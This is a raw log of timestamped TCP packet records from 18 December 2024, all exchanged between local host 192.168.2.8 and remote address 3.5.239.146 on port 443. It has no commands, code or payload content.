                                                                                                                                                                          Dec 18, 2024 13:06:04.265678883 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.265705109 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.265746117 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.265773058 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.265789032 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.273149967 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.273178101 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.273225069 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.273245096 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.273257017 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.293824911 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.293872118 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.293915987 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.293929100 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.293962002 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.305535078 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.305574894 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.305648088 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.305659056 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.305672884 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.310902119 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.310939074 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.311021090 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.311029911 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.361320972 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.361336946 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.408031940 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.442720890 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.442734003 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.442754984 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.442770004 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.442835093 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.442938089 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.442964077 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.448631048 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.448641062 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.448671103 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.448679924 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.448698044 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.448714018 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.448743105 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.454658031 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.454668999 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.454705954 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.454730988 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.454750061 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.454773903 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.454802036 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.454802990 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.460547924 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.460592985 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.460630894 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.460649967 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.460679054 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.468605995 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.468631983 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.468692064 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.468708992 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.468735933 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.488188028 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.488229990 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.488279104 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.488306999 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.488336086 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.500893116 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.500936985 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.500972033 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.501055002 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.501055002 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.501121998 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.501877069 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.506762028 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.506800890 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.506840944 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.506844997 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.506858110 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.506876945 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.506892920 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.637768030 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.637794018 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.637914896 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.637934923 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.637979031 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.638372898 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.643479109 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.643496037 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.643559933 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.643575907 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.650122881 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.650161982 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.650192022 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.650201082 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.650228977 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.650245905 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.657190084 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.657203913 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.657265902 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.657273054 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.657311916 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.657905102 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.677644014 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.677664995 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.677741051 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.677755117 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.690054893 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.690085888 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.690133095 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.690144062 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.690165997 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.695451021 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.695466042 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.695527077 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.695534945 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.736237049 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.736248016 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.783107996 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.827608109 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.827632904 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.827656031 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.827666044 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.827744007 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.827769041 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.827788115 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.827881098 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.833712101 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.833726883 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.833777905 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.833796978 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.833805084 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.833838940 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.839751005 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.839806080 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.839833021 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.839843035 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.839870930 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.845705032 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.845760107 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.845794916 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.845803976 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.845851898 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.852513075 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.852536917 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.852629900 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.852638960 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.871808052 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.871834993 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.871921062 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.871957064 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.884185076 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.884210110 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.884321928 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.884341002 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.889621973 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.889672041 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.889714003 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.889733076 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.889765024 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.939280987 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.021075964 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.021099091 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.021126032 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.021155119 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.021269083 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.021296978 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.021353960 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.026036978 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.026046038 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.026072025 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.026146889 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.026170969 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.026237965 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.026237965 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.031985044 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.032005072 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.032083988 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.032100916 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.032155037 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.045795918 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.045876980 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.045908928 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.045929909 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.045953035 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.045979977 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.046504021 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.046523094 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.046581984 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.046597004 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.046653032 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.065279961 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.065289974 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.065385103 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.065433025 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.065481901 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.076354027 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.076363087 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.076445103 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.076466084 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.076531887 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.082158089 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.082185030 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.082268000 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.082285881 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.082318068 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.082338095 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.212949991 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.212995052 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.213085890 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.213125944 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.213170052 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.216892004 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.218198061 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.218236923 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.218291998 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.218307018 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.218334913 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.218355894 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.224106073 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.224137068 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.224256039 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.224287987 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.224339962 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.229780912 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.229804039 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.229974985 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.229986906 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.230062008 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.237581015 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.237621069 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.237724066 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.237740993 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.237766981 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.237781048 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.256953001 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.256977081 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.257164955 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.257189989 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.257235050 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.268887997 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.268917084 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.268992901 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.269026041 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.269069910 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.274060011 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.274108887 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.274188995 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.274224043 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.274269104 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.404786110 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.404813051 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.404913902 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.404958010 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.405010939 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.410487890 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.410504103 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.410573959 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.410603046 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.410648108 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.416950941 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.416966915 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.417140961 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.417150021 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.417192936 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.421607971 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.421621084 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.421706915 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.421751022 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.421813965 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.429610014 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.429625988 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.429675102 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.429704905 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.429718971 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.429745913 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.449744940 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.449762106 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.449843884 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.449872017 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.449913979 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.460772038 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.460791111 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.460870981 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.460877895 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.460906029 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.460917950 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.466700077 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.466716051 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.466770887 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.466777086 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.466814995 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.597074986 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.597106934 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.597220898 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.597275972 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.597332954 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.597333908 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.602840900 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.602875948 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.602981091 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.603020906 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.603142023 CET49709443192.168.2.83.5.239.146
